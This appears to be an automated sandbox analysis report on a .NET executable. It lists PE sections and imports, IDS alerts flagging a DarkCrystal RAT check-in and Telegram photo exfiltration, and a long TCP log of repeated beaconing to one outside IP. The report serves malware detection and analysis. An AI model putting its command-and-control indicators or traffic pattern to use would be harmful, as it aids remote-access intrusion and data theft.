                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1d97f00x4b.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1da0000x320.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1dc0000xc.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x20000x1d78440x1d7a00766e44196329214e6c47bff523c0f313False0.7807628834813146data7.546099188282502IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0x1da0000x3200x400b8198af307b3bc842834464de88a26eaFalse0.3544921875data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .reloc0x1dc0000xc0x200aeea2b5a1fb43f6f7576eb301a8f3afbFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_VERSION0x1da0580x2c8data0.46207865168539325

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                Network Behavior

                                                                                                                                Suricata IDS Alerts

                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2025-01-11T15:02:22.189215+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549729104.21.38.8480TCP
                                                                                                                                2025-01-11T15:03:04.474148+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54995534.117.59.81443TCP
                                                                                                                                2025-01-11T15:03:05.486999+01001810009Joe Security ANOMALY Telegram Send Photo1192.168.2.549963149.154.167.220443TCP

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jan 11, 2025 15:02:21.644895077 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:21.652106047 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:21.653803110 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:21.654128075 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:21.663585901 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:22.003998995 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:22.009102106 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:22.130273104 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:22.189214945 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:22.408520937 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:22.408584118 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:22.408646107 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:22.490838051 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:22.498811007 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:22.593739033 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:22.593991995 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:22.598808050 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:22.859626055 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:22.937797070 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:22.943762064 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.038374901 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.038585901 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.043457031 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.047480106 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.052464008 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.052532911 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.052637100 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.057446003 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.297724962 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.469059944 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.473978996 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.473999023 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.486126900 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.507082939 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.627985954 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.809765100 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.892554045 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.892916918 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.897614956 CET8049729104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.897682905 CET4972980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.938570976 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.988553047 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:23.988715887 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:23.993592024 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:24.239921093 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:24.329881907 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:24.513726950 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:24.514424086 CET4974680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:24.520085096 CET8049746104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:24.520168066 CET4974680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:24.520325899 CET4974680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:24.521239996 CET8049739104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:24.521303892 CET4973980192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:24.530323982 CET8049746104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:24.877022982 CET4974680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:24.882565975 CET8049746104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:24.982741117 CET8049746104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:25.126780033 CET4974680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:25.235878944 CET8049746104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:25.314212084 CET4974680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:25.327615023 CET8049746104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:25.423607111 CET4974680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:25.662755966 CET4974680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:25.663296938 CET4975180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:25.667965889 CET8049746104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:25.668030024 CET4974680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:25.668356895 CET8049751104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:25.668524981 CET4975180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:25.668894053 CET4975180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:25.677628040 CET8049751104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:26.056360960 CET4975180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:26.061182022 CET8049751104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:26.129561901 CET8049751104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:26.314322948 CET4975180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:26.379487038 CET8049751104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:26.423898935 CET4975180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:26.584667921 CET4975180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:26.585304976 CET4975380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:26.589692116 CET8049751104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:26.589785099 CET4975180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:26.590218067 CET8049753104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:26.590301991 CET4975380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:26.590408087 CET4975380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:26.595248938 CET8049753104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:26.939327002 CET4975380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:26.944145918 CET8049753104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:27.069772005 CET8049753104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:27.126729965 CET4975380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:27.304451942 CET8049753104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:27.423618078 CET4975380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:27.494590044 CET4975380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:27.495718002 CET4975880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:27.502693892 CET8049753104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:27.502747059 CET4975380192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:27.505362988 CET8049758104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:27.505426884 CET4975880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:27.505590916 CET4975880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:27.511009932 CET8049758104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:27.862900972 CET4975880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:27.867912054 CET8049758104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:27.974587917 CET8049758104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:28.022991896 CET4975880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:28.214968920 CET8049758104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:28.314281940 CET4975880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:28.815495968 CET4976480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:28.815496922 CET4975880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:28.820440054 CET8049764104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:28.820595026 CET8049758104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:28.820681095 CET4975880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:28.820683002 CET4976480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:28.820836067 CET4976480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:28.825624943 CET8049764104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:29.284616947 CET8049764104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:29.426187992 CET4976480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:29.591798067 CET4976480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:29.596702099 CET8049764104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:29.596759081 CET8049764104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:29.976938963 CET8049764104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:30.067445993 CET8049764104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:30.067516088 CET4976480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:35.083091974 CET4976480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:35.086080074 CET4978680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:35.088347912 CET8049764104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:35.088416100 CET4976480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:35.091022968 CET8049786104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:35.091104984 CET4978680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:35.091372967 CET4978680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:35.096600056 CET8049786104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:35.555622101 CET8049786104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:35.626749039 CET4978680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:35.816776037 CET4978680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:35.821691036 CET8049786104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:35.821748972 CET8049786104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:36.144357920 CET8049786104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:36.314340115 CET4978680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:36.864368916 CET4978680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:36.865612984 CET4979180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:36.870297909 CET8049786104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:36.870384932 CET4978680192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:36.871818066 CET8049791104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:36.871992111 CET4979180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:36.872098923 CET4979180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:36.878623009 CET8049791104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:37.220575094 CET4979180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:37.227595091 CET8049791104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:37.336774111 CET8049791104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:37.423600912 CET4979180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:37.603458881 CET8049791104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:37.814239979 CET4979180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:38.746057987 CET4979180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:38.751169920 CET8049791104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:38.751240969 CET4979180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:38.754473925 CET4979780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:38.760286093 CET8049797104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:38.760476112 CET4979780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:38.762022018 CET4979780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:38.766947985 CET8049797104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:39.118412018 CET4979780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:39.123424053 CET8049797104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:39.240072012 CET8049797104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:39.298623085 CET4979780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:39.493933916 CET8049797104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:39.595483065 CET4979780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:39.985032082 CET4979780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:39.986068964 CET4980280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:39.990094900 CET8049797104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:39.990155935 CET4979780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:39.991022110 CET8049802104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:39.991103888 CET4980280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:39.991230011 CET4980280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:39.996180058 CET8049802104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:40.391906977 CET4980280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:40.397927999 CET8049802104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:40.434377909 CET8049802104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:40.533071041 CET4980280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:40.712829113 CET8049802104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:40.829969883 CET4980280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.116880894 CET4980280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.122211933 CET8049802104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.122286081 CET4980280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.144479990 CET4980780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.149465084 CET8049807104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.149521112 CET4980780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.150204897 CET4980780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.155049086 CET8049807104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.160888910 CET4980880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.165873051 CET8049808104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.165939093 CET4980880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.166687012 CET4980880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.171519995 CET8049808104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.502340078 CET4980780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.507194996 CET8049807104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.517494917 CET4980880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.522455931 CET8049808104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.522610903 CET8049808104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.610270977 CET8049807104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.629481077 CET8049808104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.769112110 CET4980880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.814585924 CET4980780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.860681057 CET8049807104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:41.925614119 CET4980780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:41.928787947 CET8049808104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:42.001840115 CET4980880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.213073969 CET4980780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.213274002 CET4980880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.214104891 CET4981280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.218153000 CET8049807104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:42.218238115 CET4980780192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.218420982 CET8049808104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:42.218482018 CET4980880192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.218918085 CET8049812104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:42.219016075 CET4981280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.219115019 CET4981280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.223920107 CET8049812104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:42.565023899 CET4981280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.569942951 CET8049812104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:42.666143894 CET8049812104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:42.814227104 CET4981280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.937899113 CET8049812104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:42.938596010 CET4981280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:42.943588972 CET8049812104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:42.943655968 CET4981280192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:43.526618004 CET4982480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:43.531426907 CET8049824104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:43.531505108 CET4982480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:43.531637907 CET4982480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:43.539222956 CET8049824104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:43.877500057 CET4982480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:43.882366896 CET8049824104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:44.006306887 CET8049824104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:44.127263069 CET4982480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:44.276078939 CET8049824104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:44.423708916 CET4982480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:45.484077930 CET4982480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:45.484888077 CET4983580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:45.489347935 CET8049824104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:45.489418983 CET4982480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:45.489793062 CET8049835104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:45.489861965 CET4983580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:45.489975929 CET4983580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:45.494839907 CET8049835104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:45.845597982 CET4983580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:45.850424051 CET8049835104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:45.933794975 CET8049835104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:46.017380953 CET4983580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:46.191062927 CET8049835104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:46.314913988 CET4983580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:46.545409918 CET4983580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:46.546261072 CET4984180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:46.552377939 CET8049835104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:46.552432060 CET8049841104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:46.552544117 CET4983580192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:46.552546978 CET4984180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:46.557831049 CET4984180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:46.562819004 CET8049841104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:46.908202887 CET4984180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:46.913127899 CET8049841104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:47.024224043 CET8049841104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:47.065486908 CET4984480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:47.070310116 CET8049844104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:47.070391893 CET4984480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:47.070542097 CET4984480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:47.075381041 CET8049844104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:47.090984106 CET4984180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:47.096126080 CET8049841104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:47.096189976 CET4984180192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:47.439502954 CET4984480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:47.444380045 CET8049844104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:47.444503069 CET8049844104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:47.534050941 CET8049844104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:47.648154974 CET4984480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:47.819418907 CET8049844104.21.38.84192.168.2.5
                                                                                                                                Jan 11, 2025 15:02:47.902178049 CET4984480192.168.2.5104.21.38.84
                                                                                                                                Jan 11, 2025 15:02:47.907140017 CET8049844104.21.38.84192.168.2.5
